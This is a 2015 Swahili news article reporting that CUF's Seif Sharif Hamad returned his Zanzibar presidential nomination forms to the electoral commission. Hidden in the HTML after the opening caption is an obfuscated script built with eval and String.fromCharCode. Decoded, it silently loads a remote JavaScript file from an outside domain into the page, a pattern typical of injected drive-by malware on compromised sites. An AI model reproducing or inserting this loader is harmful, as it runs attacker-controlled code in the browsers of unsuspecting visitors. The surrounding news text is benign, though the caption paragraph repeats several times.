Recent Comments

Seif arejesha fomu ya urais Zanzibar

By Baraka Bitariho Sep 5, 2015
<p>Katibu Mkuu wa CUF Maalim Seif Sharif Hamad arejesha Fomu za kugombea Urais wa Zanzibar Tume ya Uchaguzi ZEC, akimkabidhi Mwenyekiti wa Tume ya Uchaguzi Zanzibar Mhe jecha S Jecha ofisi za Tume ya Uchaguzi ziliko katika hoteli ya bwawani Zanzibar</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Katibu Mkuu wa CUF Maalim Seif Sharif Hamad arejesha Fomu za kugombea Urais wa Zanzibar Tume ya Uchaguzi ZEC, akimkabidhi Mwenyekiti wa Tume ya Uchaguzi Zanzibar Mhe jecha S Jecha ofisi za Tume ya Uchaguzi ziliko katika hoteli ya bwawani Zanzibar
Katibu Mkuu wa CUF Maalim Seif Sharif Hamad arejesha Fomu za kugombea Urais wa Zanzibar Tume ya Uchaguzi ZEC, akimkabidhi Mwenyekiti wa Tume ya Uchaguzi Zanzibar Mhe jecha S Jecha ofisi za Tume ya Uchaguzi ziliko katika hoteli ya bwawani Zanzibar

MGOMBEA wa urais wa Zanzibar kwa tiketi ya Chama cha Wananchi (CUF), Seif Sharif Hamad amerudisha fomu ya kuwania nafasi hiyo kwa mara ya tano huku akisema imani yake kubwa kwamba uchaguzi mkuu utakuwa huru na haki utakaofuata misingi ya uadilifu.

Maalim alikabidhi fomu hizo mbele ya Mwenyekiti wa Tume ya uchaguzi ya Zanzibar (ZEC), Jecha Salim Jecha baada ya kukamilisha masharti mbali mbali ikiwemo kutakiwa kupata wadhamini 200 kutoka Unguja na Pemba.

Aliitaka Tume ya uchaguzi ya Zanzibar (ZEC) kufanya kazi kwa kuzingatia sheria na maadili ambayo yatatoa nafasi sawa kwa vyama vyote vinavyoshiriki katika uchaguzi mkuu. “Matumaini yangu makubwa na imani yangu ni kwamba Tume ya uchaguzi ya Zanzibar itatenda haki na kusimamia uchaguzi mkuu kwa misingi ya demokrasia ya uwazi na huru,” alisema.

Katika tukio hilo la urudishaji fomu, alisindikizwa na Naibu Katibu Mkuu wa (CUF), Ismail Jussa Ladhu pamoja na mshauri mwandamizi wa Maalim Seif anayeshughulikia siasa, Mansour Yussuf Himid.

Pia aliongozana na Waziri wa Nchi, Ofisi ya Makamu wa Kwanza wa Rais, Fatma Alhabib Fereji pamoja na Naibu Waziri wa Elimu na Mafunzo ya Amali, Zahra Hamad. Mwaka huu kuna vyama 15 vya siasa ambavyo zimetoa wagombea kuchukuwa fomu kwa ajili ya kuwania nafasi ya urais wa Zanzibar, idadi ambayo ni kubwa zaidi kuwahi kutokea tangu kuanza kwa uchaguzi unaoshirikisha vyama vingi vya siasa mwaka 1995.

Seif amekuwa mgombea wa kwanza wa nafasi ya urais kurudisha fomu ya kuwania nafasi hiyo ambapo kwa mujibu wa ratiba ya Tume ya uchaguzi ya Zanzibar inaonesha kwamba Septemba 7 harakati za kampeni za urais zitaanza kwa vyama vya siasa visiwani hapa.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com